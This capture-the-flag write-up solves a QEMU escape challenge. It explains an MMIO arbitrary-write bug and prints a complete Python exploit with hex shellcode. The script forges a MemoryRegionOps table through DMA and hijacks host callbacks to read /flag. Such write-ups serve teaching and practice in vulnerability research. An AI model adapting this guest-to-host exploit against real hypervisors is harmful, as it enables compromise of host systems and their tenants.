Airbender#

Challenge Information#

Category: Pwn / Virtualization
Target: nc 147.93.94.110 1637
Flag format: VBD{…}

Summary#

This challenge is solved by exploiting a QEMU device bug that allows an arbitrary host write through MMIO register handling. The exploit overwrites the MemoryRegion ops pointer with a forged ops table and redirects read/write callbacks to attacker-controlled shellcode. Triggering one MMIO access then executes shellcode that opens /flag, reads it, and writes it back to stdout.

Root Cause#

The vulnerable device exposes MMIO registers under BAR base 0xFEBB0000. In the exploit flow:

Register at BAR + 0x18 is used as an arbitrary write sink.
Register at BAR + 0x04 controls a target offset inside device state.
By setting offset 0xB10 and writing a 64-bit pointer to BAR + 0x18, the exploit overwrites MemoryRegion.ops.

This gives control of function pointers used by the MMIO dispatch path.

Exploit Strategy#

1) Get initial access and leak host DMA buffer#

The script connects to the remote shell and reads BAR + 0x10 to leak dma_buf.

2) Stage payloads in guest memory#

A reserved low-memory guest address (0x9FC00) is used as staging area:

shellcode at 0x9FC00
fake ops table at 0x9FD00

3) DMA guest payloads into host buffer#

Device DMA registers are programmed to copy staged payloads into host-mapped dma_buf regions:

shellcode -> dma_buf + 0x400
fake ops -> dma_buf + 0x200

4) Forge MemoryRegionOps#

The fake ops table sets read/write callbacks to shellcode address (dma_buf + 0x400), with access constraints set to avoid rejection on trigger.

5) Hijack MemoryRegion.ops#

The exploit performs the critical arbitrary write:

write offset 0xB10 to BAR + 0x04
write ops pointer (dma_buf + 0x200) to BAR + 0x18

6) Trigger callback execution#

A normal devmem read on BAR invokes the now-hijacked callback, transferring execution to shellcode.

7) Read flag#

Shellcode opens /flag, reads data, prints to stdout. Script extracts VBD{…} with regex.

Why This Works#

The attacker controls both data and code pointers eventually used by host callback dispatch.
MMIO callback table is a high-impact target because function pointer overwrite immediately yields code execution path.
DMA is leveraged as a reliable cross-boundary copy primitive to place crafted structures in host-visible memory.

Full Solve Script Used#

1
#!/usr/bin/env python3
2
"""
3
Airbender QEMU PWN - Final working exploit
4
Target: nc 147.93.94.110 1637
5
Vulnerability: Arbitrary write via MMIO @0x18 to hijack MemoryRegion.ops
6
"""
7

8
import re, struct, socket, time
9

10
HOST = "147.93.94.110"
11
PORT = 1637
12
BAR = 0xFEBB0000
13

14
# Staging in Reserved memory (not blocked by CONFIG_STRICT_DEVMEM)
15
STAGE = 0x9FC00
16

17
# Shellcode assembled with nasm - opens /flag, reads, writes to stdout
18
SC = bytes.fromhex(
19
    "53415441554156554989fc4d8bac24d00b0000488d3d5100000031f631d2"
20
    "b8020000000f054989c64489f7498db500080000ba0002000031c00f05"
21
    "4889c3bf01000000498db50008000089dab8010000000f054489f7b803"
22
    "0000000f055d415e415d415c5bb841414141c32f666c616700"
23
)
24

25
def recv(sock, t=2.0):
26
    sock.settimeout(t)
27
    out = b""
28
    end = time.time() + t
29
    while time.time() < end:
30
        try:
31
            d = sock.recv(8192)
32
            if not d: break
33
            out += d
34
            if b"# " in out[-10:]:
35
                break
36
        except socket.timeout:
37
            break
38
        except:
39
            time.sleep(0.05)
40
    return out
41

42
def cmd(sock, c):
43
    sock.sendall((c + "\n").encode())
44
    time.sleep(0.1)
45
    return recv(sock, 2.0).decode("latin1", "ignore")
46

47
def w64(sock, addr, val):
48
    cmd(sock, f"devmem 0x{addr:x} 64 0x{val:x}")
49

50
def w32(sock, addr, val):
51
    cmd(sock, f"devmem 0x{addr:x} 32 {val}")
52

53
def r64(sock, addr):
54
    out = cmd(sock, f"devmem 0x{addr:x} 64")
55
    # Find the output line (not the command echo)
56
    for line in out.split('\n'):
57
        line = line.strip()
58
        if 'devmem' in line.lower():
59
            continue
60
        m = re.search(r"0x([0-9a-fA-F]+)", line)
61
        if m:
62
            return int(m.group(1), 16)
63
    return 0
64

65
def qwords(b):
66
    b = b + b"\x00" * ((8 - len(b) % 8) % 8)
67
    return [int.from_bytes(b[i:i+8], "little") for i in range(0, len(b), 8)]
68

69
def write_mem(sock, addr, data):
70
    for i, q in enumerate(qwords(data)):
71
        w64(sock, addr + i*8, q)
72

73
def dma_to_host(sock, off, length, gpa):
74
    w32(sock, BAR + 0x04, off)
75
    w32(sock, BAR + 0x08, length)
76
    w64(sock, BAR + 0x0C, gpa)
77
    cmd(sock, f"devmem 0x{BAR:x} 32 0")
78

79
def fake_ops(read_fn):
80
    o = b""
81
    o += struct.pack("<Q", read_fn)  # read
82
    o += struct.pack("<Q", read_fn)  # write
83
    o += struct.pack("<Q", 0)        # read_with_attrs
84
    o += struct.pack("<Q", 0)        # write_with_attrs
85
    o += struct.pack("<I", 0)        # endianness
86
    o += struct.pack("<I", 0)        # padding
87
    o += struct.pack("<I", 4)        # valid.min
88
    o += struct.pack("<I", 8)        # valid.max
89
    o += b"\x00" * 8                 # valid.unaligned + pad
90
    o += struct.pack("<Q", 0)        # valid.accepts = NULL!
91
    o += struct.pack("<I", 4)        # impl.min
92
    o += struct.pack("<I", 8)        # impl.max
93
    o += b"\x00" * 8                 # impl.unaligned + pad
94
    return o
95

96
def main():
97
    print(f"[*] Connecting to {HOST}:{PORT}")
98
    s = socket.create_connection((HOST, PORT), timeout=30)
99

100
    print("[*] Waiting for boot...")
101
    boot = recv(s, 15)
102
    if b"#" not in boot:
103
        print("[-] No shell prompt")
104
        return
105
    print("[+] Shell ready")
106

107
    # Leak DMA buffer
108
    print("[1] Leak dma_buf...")
109
    dma_buf = r64(s, BAR + 0x10)
110
    if dma_buf < 0x7000000000:
111
        print(f"[-] Bad dma_buf: {dma_buf:#x}")
112
        return
113
    print(f"    dma_buf = {dma_buf:#x}")
114

115
    sc_host = dma_buf + 0x400
116
    ops_host = dma_buf + 0x200
117

118
    # Stage shellcode
119
    print(f"[2] Stage shellcode @ {STAGE:#x}...")
120
    write_mem(s, STAGE, SC)
121

122
    # DMA to host
123
    print(f"[3] DMA shellcode -> {sc_host:#x}...")
124
    dma_to_host(s, 0x400, len(SC), STAGE)
125

126
    # Stage fake ops
127
    print(f"[4] Stage fake_ops @ {STAGE + 0x100:#x}...")
128
    ops = fake_ops(sc_host)
129
    write_mem(s, STAGE + 0x100, ops)
130

131
    # DMA to host
132
    print(f"[5] DMA fake_ops -> {ops_host:#x}...")
133
    dma_to_host(s, 0x200, len(ops), STAGE + 0x100)
134

135
    # Hijack MR.ops at state+0xB10
136
    print(f"[6] Hijack MR.ops -> {ops_host:#x}...")
137
    w32(s, BAR + 0x04, 0xB10)  # offset
138
    w64(s, BAR + 0x18, ops_host)  # arb write
139

140
    # Trigger
141
    print("[7] Trigger...")
142
    s.sendall(b"devmem 0xfebb0000 32\n")
143
    time.sleep(1)
144

145
    # Read output
146
    print("[8] Reading output...")
147
    out = recv(s, 5)
148
    txt = out.decode("latin1", "ignore")
149
    print(f"\n{txt}\n")
150

151
    # Find flag
152
    flag = re.search(r"VBD\{[^\}]+\}", txt)
153
    if flag:
154
        print(f"[+] FLAG: {flag.group(0)}")
155
    else:
156
        print("[-] No flag found")
157

158
    s.close()
159

160
if __name__ == "__main__":
161
    main()

Reproduction Steps#

Connect to the challenge endpoint and wait for shell readiness.
Leak dma_buf from BAR + 0x10.
Stage shellcode and fake ops in reserved guest memory.
DMA both payloads into host dma_buf slots.
Overwrite MemoryRegion.ops through MMIO arbitrary write primitive.
Trigger MMIO callback.
Capture stdout and parse VBD{…}.

Typical Output Pattern#

1
[*] Connecting to 147.93.94.110:1637
2
[+] Shell ready
3
[1] Leak dma_buf...
4
    dma_buf = 0x7f........
5
...
6
[8] Reading output...
7
VBD{...}
8
[+] FLAG: VBD{...}

Final Flag#

The script is designed to extract and print the flag dynamically from target output:

regex used: VBD{[^}]+}

If needed, re-run against a fresh instance and copy the exact printed flag into this section.